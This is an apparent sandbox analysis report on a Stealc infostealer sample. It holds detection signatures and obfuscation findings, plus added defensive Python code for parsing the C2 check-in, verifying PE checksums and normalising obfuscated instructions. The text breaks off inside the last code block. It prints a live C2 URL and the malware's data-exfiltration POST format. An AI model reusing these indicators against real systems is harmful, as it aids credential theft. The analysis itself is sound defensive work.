Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528404
MD5: ff372169f2c0278490593f4abbfcceac
SHA1: 82f8e81327c943fe7e1ca4b2cf16116052f419f8
SHA256: 25020e52a52db73e1c53c36bca3aa4dd40c57f609637745546e6e56076a4e439
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FF372169F2C0278490593F4ABBFCCEAC)
  • cleanup

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (source | rule | description | author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6780 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6780 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.c50000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (timestamp | SID | severity | classtype | source | destination | protocol):
2024-10-07T22:08:10.098436+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49730 | 185.215.113.37:80 | TCP
AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.c50000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5C820: lstrlen, CryptStringToBinaryA, lstrcat, lstrcat, lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C59AC0: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C57240: GetProcessHeap, RtlAllocateHeap, CryptUnprotectData, WideCharToMultiByte, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C59B60: CryptUnprotectData, LocalAlloc, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C68EA0: CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C638B0: wsprintfA, FindFirstFileA, lstrcat, StrCmpCA, StrCmpCA, wsprintfA, PathMatchSpecA, CoInitialize, CoUninitialize, lstrcat, lstrlen, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, wsprintfA, CopyFileA, __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C64910: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5DA80: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5E430: FindFirstFileA, StrCmpCA, StrCmpCA, FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C64570: GetProcessHeap, RtlAllocateHeap, wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, CopyFileA, DeleteFileA, FindNextFileA, FindClose, lstrcat, lstrcat, lstrlen, lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5ED20: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrlen, DeleteFileA, CopyFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C516D0: FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C63EA0: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5F6B0: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5BE70: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, StrCmpCA, DeleteFileA, StrCmpCA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C5DE10: FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKEC
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 42 41 36 36 38 39 32 44 39 32 34 31 37 39 35 33 37 33 33 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a
  Data Ascii (CRLF line ends):
  ------BKFCBFCBFBKEBFIDBKEC
  Content-Disposition: form-data; name="hwid"

  4EBA66892D924179537338
  ------BKFCBFCBFBKEBFIDBKEC
  Content-Disposition: form-data; name="build"

  doma
  ------BKFCBFCBFBKEBFIDBKEC--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times; the C2 is addressed by raw IP, so no DNS lookup precedes the connections)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C54880: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, lstrlen, HttpSendRequestA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (the same 211-byte multipart request as recorded above, from an unattributed connection)
Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000846000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php65d60108622213
Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpk
Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx9
Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37S
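The check-in above is the only C2 exchange the sandbox recorded: a POST to /<16 hex chars>.php with a multipart body carrying exactly two fields, hwid and build (the build value "doma" is the Botnet value of the extracted configuration). The Python below is an added example and not part of the Joe Sandbox report: it rebuilds the recorded 211-byte body from the Data Ascii dump, parses the multipart form using the boundary taken from the Content-Type header, and applies a constructed heuristic for this request shape. That heuristic is modelled on this single capture and is not the text of Suricata rule 2044243, which the report does not reproduce; the field names and URI pattern are the ones visible in the capture.

```python
"""Parse the Stealc check-in POST recorded in this report.

Added example (not report code). BODY is the request body reconstructed from
the report's Data Ascii dump with CRLF line ends; its length must equal the
captured Content-Length of 211. The detection heuristic is a constructed rule
based on this one request, not the referenced Suricata signature.
"""
import re
from typing import Dict, Optional

# Request line and Content-Type header exactly as recorded in the report.
REQUEST_LINE = "POST /e2b1563c6670f193.php HTTP/1.1"
CONTENT_TYPE = "multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKEC"

# Body reconstructed from the report's "Data Ascii" dump.
BODY = (
    b"------BKFCBFCBFBKEBFIDBKEC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"4EBA66892D924179537338\r\n"
    b"------BKFCBFCBFBKEBFIDBKEC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------BKFCBFCBFBKEBFIDBKEC--\r\n"
)


def boundary_from_content_type(content_type: str) -> Optional[str]:
    """Return the boundary parameter of a multipart Content-Type header, or None."""
    m = re.search(r'boundary="?([^";\s]+)"?', content_type)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> Dict[str, str]:
    """Split a multipart/form-data body into {field name: value}.

    Each part is delimited by "--" + boundary; the closing delimiter carries a
    trailing "--". Only the Content-Disposition name is honoured, which is all
    this C2 format uses (no file parts, no nested multipart).
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: Dict[str, str] = {}
    for part in body.split(delimiter):
        # Skip the (empty) preamble and the "--\r\n" closer.
        if not part or part.startswith(b"--"):
            continue
        part = part.removeprefix(b"\r\n").removesuffix(b"\r\n")
        headers, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue  # malformed part without a header/body separator
        m = re.search(rb'name="([^"]*)"', headers)
        if m:
            name = m.group(1).decode("ascii", "replace")
            fields[name] = value.decode("utf-8", "replace")
    return fields


def looks_like_stealc_checkin(request_line: str, fields: Dict[str, str]) -> bool:
    """Constructed heuristic: POST to /<16 lowercase hex>.php with exactly hwid and build."""
    method, _, rest = request_line.partition(" ")
    path = rest.split(" ", 1)[0]
    return (
        method == "POST"
        and re.fullmatch(r"/[0-9a-f]{16}\.php", path) is not None
        and set(fields) == {"hwid", "build"}
    )


def analyse_capture() -> Dict[str, str]:
    """Parse the embedded request and return its fields plus a verdict key."""
    boundary = boundary_from_content_type(CONTENT_TYPE)
    if boundary is None:
        raise ValueError("no multipart boundary in Content-Type")
    fields = parse_multipart(BODY, boundary)
    verdict = "stealc-checkin" if looks_like_stealc_checkin(REQUEST_LINE, fields) else "unknown"
    return {**fields, "verdict": verdict}


if __name__ == "__main__":
    for key, val in analyse_capture().items():
        print(f"{key}: {val}")
```

The hwid value is the per-victim identifier the C2 keys its records on, and build is the campaign tag, so both are the fields worth extracting from a pcap during incident response; the parser deliberately derives the boundary from the header rather than hard-coding the random string, since every build chooses a new one.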

System Summary

Source: file.exe | Static PE information: section name: (name blank or unprintable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (name blank or unprintable)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F290F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA58F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA88CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101C189
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01063826
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED59B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102807C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01029BB4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01031236
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102D274
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102555A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101DCCA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01032729
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010AA775
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4FB2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F92759
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102B6AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01022EB2
Source: C:\Users\user\Desktop\file.exe | Code function: String function 00C545C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: npcvtcpc ZLIB complexity 0.9952324127482477
Source: file.exe, 00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C68680: CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C63720: CoCreateInstance, MultiByteToWideChar, lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LEL4NSM5.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1909760 > 1048576
Source: file.exe | Static PE information: Raw size of npcvtcpc is bigger than: 0x100000 < 0x1ac000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.c50000.0.unpack
  section rights in memory: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; npcvtcpc:EW; stnuknqq:EW; .taggant:EW
  section rights on disk:   (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; npcvtcpc:EW; stnuknqq:EW; .taggant:EW
  (the first, unnamed section goes from executable/readable on disk to executable/writable at runtime, which is what the "changes PE section rights" unpacking signature keys on)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C69860: GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ded9a should be: 0x1e0d64
Source: file.exe | Static PE information: section name: (name blank or unprintable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (name blank or unprintable)
Source: file.exe | Static PE information: section name: npcvtcpc
Source: file.exe | Static PE information: section name: stnuknqq
Source: file.exe | Static PE information: section name: .taggant
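The report flags the stored PE checksum (0x1ded9a) as differing from the value computed over the file (0x1e0d64), the usual side effect of a packer rewriting the image after the linker filled the field. The Python below is an added example, not part of the report, and it is not run against this sample (the file's bytes are not on the page): it implements the CheckSumMappedFile algorithm from imagehlp (sum of little-endian 16-bit words with the CheckSum dword excluded, carries folded, file size added), locates the CheckSum field from the headers, and exercises it on a constructed 156-byte MZ/PE stub so the arithmetic can be followed by hand.

```python
"""Recompute and verify the IMAGE_OPTIONAL_HEADER.CheckSum of a PE image.

Added example (not report code). The stub built by build_minimal_header() is
constructed for illustration: an MZ header, e_lfanew = 0x40, a PE signature and
otherwise zeroed headers. Any real file can be passed to verify_checksum().
"""
import struct
from typing import Tuple


def checksum_field_offset(data: bytes) -> int:
    """Offset of CheckSum: e_lfanew + 4 (PE signature) + 20 (file header) + 64.

    The 64-byte offset into the optional header is the same for PE32 and PE32+.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew + 0x58


def pe_checksum(data: bytes) -> int:
    """imagehlp-style checksum: 16-bit word sum with end-around carry plus file size."""
    skip = checksum_field_offset(data)
    padded = data + b"\0" if len(data) % 2 else data
    total = 0
    for off in range(0, len(padded), 2):
        if skip <= off < skip + 4:
            continue  # the CheckSum dword itself is not part of the sum
        total += padded[off] | (padded[off + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def verify_checksum(data: bytes) -> Tuple[int, int, bool]:
    """Return (stored, computed, matches).

    A stored value of 0 means the linker never set the field (common for
    user-mode binaries) and is a different finding from a stale, wrong value.
    """
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = pe_checksum(data)
    return stored, computed, stored == computed


def build_minimal_header(stored_checksum: int = 0) -> bytes:
    """Constructed 156-byte stub whose only non-zero words are MZ, e_lfanew and PE\\0\\0."""
    buf = bytearray(0x40 + 0x58 + 4)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 0x58, stored_checksum)
    return bytes(buf)


if __name__ == "__main__":
    stored, computed, ok = verify_checksum(build_minimal_header(0x1234))
    print(f"stored 0x{stored:x}, computed 0x{computed:x}, match={ok}")
```

For the stub the word sum is 0x5A4D ("MZ") + 0x0040 (e_lfanew) + 0x4550 ("PE") = 0x9FDD, plus the 156-byte length gives 0xA079; because the field is excluded from the sum, writing any value into it leaves the computed result unchanged, which is why a packer that patches sections but leaves the old CheckSum produces exactly the mismatch the report shows.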
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00F290F6: push edi; mov dword ptr [esp], eax (at 0_2_00F29100)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00F290F6: push eax; mov dword ptr [esp], edx (at 0_2_00F29168)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00F290F6: push 7B73976Eh; mov dword ptr [esp], ebx (at 0_2_00F29172)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00F290F6: push edi; mov dword ptr [esp], ebx (at 0_2_00F2920D)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00F290F6: push ecx; mov dword ptr [esp], eax (at 0_2_00F29287)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00F290F6: push 6209DF9Ch; mov dword ptr [esp], edx (at 0_2_00F29321)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA58F3: push 4FD22DE1h; mov dword ptr [esp], ecx (at 0_2_00FA590E)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA58F3: push edx; mov dword ptr [esp], 77FBDC94h (at 0_2_00FA59B3)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA58F3: push 04FE3CA5h; mov dword ptr [esp], esi (at 0_2_00FA59E0)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA58F3: push 7860A1DFh; mov dword ptr [esp], edi (at 0_2_00FA5A26)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_01079112: push eax; mov dword ptr [esp], ebx (at 0_2_01079188)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_010D8118: push edx; mov dword ptr [esp], eax (at 0_2_010D8139)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_010D1920: push ebx; mov dword ptr [esp], ecx (at 0_2_010D1937)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_010D1920: push edi; mov dword ptr [esp], esi (at 0_2_010D1B0F)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_01030133: push eax; mov dword ptr [esp], 196E6A2Ch (at 0_2_01030143)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA88CF: push edi; mov dword ptr [esp], edx (at 0_2_00FA88DC)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA88CF: push eax; mov dword ptr [esp], 6B790D47h (at 0_2_00FA893A)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA88CF: push 5AE7FEDBh; mov dword ptr [esp], eax (at 0_2_00FA89F6)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA88CF: push edi; mov dword ptr [esp], ebx (at 0_2_00FA8A21)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FA88CF: push 2AD928E8h; mov dword ptr [esp], ecx (at 0_2_00FA8A48)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0107915D: push 3EEF6C1Eh; mov dword ptr [esp], edx (at 0_2_0107917B)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0107915D: push ecx; mov dword ptr [esp], esi (at 0_2_010791CB)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0107915D: push eax; mov dword ptr [esp], ecx (at 0_2_010791DF)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0107915D: push 209DC19Fh; mov dword ptr [esp], edx (at 0_2_010792B8)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_010BB97B: push 26C36CA7h; mov dword ptr [esp], eax (at 0_2_010BB9A2)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_01038171: push 17E9E749h; mov dword ptr [esp], edx (at 0_2_0103817F)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0101C189: push ebx; mov dword ptr [esp], ebp (at 0_2_0101C1B5)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0101C189: push 09B0C2BFh; mov dword ptr [esp], esi (at 0_2_0101C1C8)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0101C189: push eax; mov dword ptr [esp], ecx (at 0_2_0101C21B)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0101C189: push eax; mov dword ptr [esp], esp (at 0_2_0101C23F)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0101C189: push esi; mov dword ptr [esp], ecx (at 0_2_0101C272)
Source: file.exe | Static PE information: section name: npcvtcpc entropy: 7.9550669046081595
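The push/mov pairs listed above are the pattern the signature list summarises as "Uses code obfuscation techniques (call, push, ret)": "push X; mov dword ptr [esp], Y" writes Y into the slot the push reserved, so the pushed X is dead and the pair behaves like a plain "push Y". The Python below is an added example, not part of the report: it normalises such pairs, with rows copied from the listing above as constructed sample input, and refuses the one variant where the rewrite is unsound, a store of esp itself, because that records the post-push stack pointer rather than the value "push esp" would store.

```python
"""Collapse 'push X; mov dword ptr [esp], Y' pairs into the 'push Y' they implement.

Added example (not report code). SAMPLE_ROWS is constructed from the
"Code function" rows in the report's Data Obfuscation section.
"""
import re
from typing import List, Tuple

# (function, instruction pair as listed, address of the pair) from the report.
SAMPLE_ROWS: List[Tuple[str, str, str]] = [
    ("0_2_00F290F6", "push edi; mov dword ptr [esp], eax", "0_2_00F29100"),
    ("0_2_00F290F6", "push 7B73976Eh; mov dword ptr [esp], ebx", "0_2_00F29172"),
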